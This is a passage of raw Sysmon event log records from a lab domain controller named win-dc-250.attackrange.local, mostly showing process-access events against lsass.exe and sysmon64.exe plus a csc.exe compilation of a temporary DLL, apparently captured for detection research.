13:08:44.950{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.934{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.872{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.872{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.872{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:08:44.372{08A6967A-425C-6000-CF02-000000009901}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\zdaf1vyu.dll2021-01-14 13:08:44.200 10341000x8000000000000000162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-4258-6000-CA02-000000009901}47364744C:\Windows\system32\conhost.exe{08A6967A-425C-6000-D002-000000009901}4500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40D2-6000-0500-000000009901}6443180C:\Windows\system32\csrss.exe{08A6967A-425C-6000-D002-000000009901}4500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.356{08A6967A-425C-6000-CF02-000000009901}25924336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{08A6967A-425C-6000-D002-000000009901}4500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.363{08A6967A-425C-6000-D002-000000009901}4500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES17C0.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC13DD1667806448B79AE4E57458726249.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4258-6000-5FAB-100000000000}0x10ab5f0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{08A6967A-425C-6000-CF02-000000009901}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\zdaf1vyu.cmdline" 10341000x8000000000000000149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-4258-6000-CA02-000000009901}47364744C:\Windows\system32\conhost.exe{08A6967A-425C-6000-CF02-000000009901}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\S